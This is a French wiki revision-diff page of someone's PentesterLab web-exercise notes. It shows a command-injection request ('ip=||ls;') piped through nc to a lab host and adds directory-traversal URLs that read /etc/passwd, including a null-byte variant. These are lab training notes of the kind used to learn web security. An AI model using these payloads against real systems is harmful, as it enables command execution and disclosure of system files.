Outils pour utilisateurs

Outils du site


web:pentesterlab_web

Différences

Ci-dessous, les différences entre deux révisions de la page.

Lien vers cette vue comparative

Les deux révisions précédentes Révision précédente
web:pentesterlab_web [2015/03/20 16:15]
x86
web:pentesterlab_web [2015/03/20 16:25] (Version actuelle)
x86
Ligne 80: Ligne 80:
  
 echo "GET /​commandexec/​example3.php?​ip=||ls;"​ | nc 192.168.1.34 80 echo "GET /​commandexec/​example3.php?​ip=||ls;"​ | nc 192.168.1.34 80
 +</​code>​
 +
 +====== Directory Traversal ======
 +
 +<​code>​
 +http://​192.168.1.34/​dirtrav/​example1.php?​file=../​../​../​../​../​../​etc/​passwd
 +
 +http://​192.168.1.34/​dirtrav/​example2.php?​file=/​var/​www/​files/​../​../​../​../​etc/​passwd
 +
 +http://​192.168.1.34/​dirtrav/​example3.php?​file=../​../​../​../​../​etc/​passwd%00
 </​code>​ </​code>​
web/pentesterlab_web.txt · Dernière modification: 2015/03/20 16:25 par x86